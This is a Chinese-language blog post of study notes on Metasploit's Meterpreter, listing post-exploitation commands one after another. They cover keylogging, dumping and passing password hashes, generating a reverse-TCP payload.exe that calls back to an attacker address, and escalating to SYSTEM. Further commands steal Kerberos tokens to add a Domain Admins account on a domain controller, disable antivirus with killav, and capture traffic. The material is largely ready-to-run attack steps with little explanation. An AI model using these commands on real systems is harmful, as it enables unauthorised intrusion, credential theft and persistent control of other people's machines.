zoukankan      html  css  js  c++  java
  • Metasploit 读书笔记-神器Meterpreter

    一、基本命令

    1. 截屏

    screenshot

    2.获取系统平台信息

    sysinfo

    3.进程信息

    ps

    4.获取键盘记录

    查看进程信息ps--migrate将会话迁移至explorer.exe进程空间中---然后--

    run post/windows/capture/keylog_recorder

    过一段时间CTRL+C中止。

    最后在另一个终端里,可以看到我们使用键盘记录所捕捉的内容。


    5.提取密码哈希

    use priv运行特权账号

    run post/windows/gather/hashdump

    6.传递hash值

    use windows/smb/psexec

    set PAYLOAD windows/meterpreter/reverse_tcp

    7.权限提升

    当我们获得了目标系统的访问权限,可以通过net user命令创建限制权限的普通用户帐号。

    XP系统中:

    net user bob password123 /add.

    然后,创建一个基于Meterpreter的攻击程序payload.exe,复制到目标XP机器上,并在bob用户下运行。

    利用攻击载荷生成器(msfpayload)来创建Windows可执行文件格式的Meterpreter攻击载荷程序payload.exe.

    root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp

    LHOST=192.168.33.139 LPORT=443 X>payload.exe

    root@bt:/opt/framework3/msf3# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp

    LHOST=192.168.33.139 LPORT=443 E

    meterpreter> getuid

    创建载荷时,设置LHOST和LPORT参数指示了反向shell连接到攻击机的地址和端口443,

    随后调用msfcli接口进行监听并等待连接,当有连接到达时,将会开启Meterpreter的shell。

    shell

    use priv

    getsystem

    getuid

    8.令牌假冒

    在令牌假冒攻击中,我们获取目标系统中的一个Kerberos令牌,将其用在身份认证环节,来假冒当初创建这个令牌的用户。这是Meterpreter最强大的功能之一。

    用户登录服务器时,一个Kerberos令牌会在服务器上在一段时间内保持有效。

    我们就可以利用这个令牌入侵系统,而不需破解他的密码。

    9.使用PS

    使用PS查看进程

    使用steal_token命令和PID参数,盗取域管理员用户的令牌。PID为域管理员运行的进程

    另外,有些情况下PS命令不能列出域管理员运行的进程,我们可以使用incognito命令列出系统中可用的令牌。

    最好是同时检查ps命令和incognito命令的输出结果。

    通过use incognito命令加载incognito模块,然后通过list_tokens -u列出令牌。

    假冒令牌:

    impersonate_token ****\***(注意双斜杠)

    添加用户:

    add_user omgcom password123 -h 192.168.33.50(域控)

    赋予域管理员权限:

    add_group_user "Domain Admins" omgcom -h 192.168.33.50


    10.跳板攻击(Pivoting)

    允许从Meterpreter 终端攻击网络中的其他系统。

    跳板攻击允许你使用已经取得控制的Meterpreter终端来攻击内部网络中的其他机器。

    11.使用Meterpreter脚本

    run 脚本名字

    12.迁移进程

    攻击系统时常常利用IE漏洞等,如果目标主机关闭了浏览器,Meterpreter会话也随之关闭,从而导致目标丢失。

    渗透以后要将会话迁移到内存空间稳定的、不会关闭的服务进程中,以维持稳定的控制。

    run post/windows/manage/migrate

    13.关闭杀毒软件

    run killav

    14。获取系统密码hash

    run hashdump

    15.查看目标所有流量

    run packetrecorder -i 1

    16.获取系统信息

    Scraper脚本可以获取用户名、密码、注册表、哈希值、收集系统信息等。

    run scraper

    17。控制持久化


  • 相关阅读:
    【学习小记】一般图最大匹配——带花树算法
    如何检查oracle的归档空间是否满了
    Linux 的计划任务
    转 oracle的热备份和冷备份
    SQLException: Io 异常: Connection refused ERR=12514 ERR=1153异常处理过程
    查看oracle数据库版本
    ORACLE默认实例设置--linux
    oracle查看用户属于哪个表空间
    oracle默认数据库实例
    oracle 查看用户所在的表空间
  • 原文地址:https://www.cnblogs.com/arhatlohan/p/4217038.html
Copyright © 2011-2022 走看看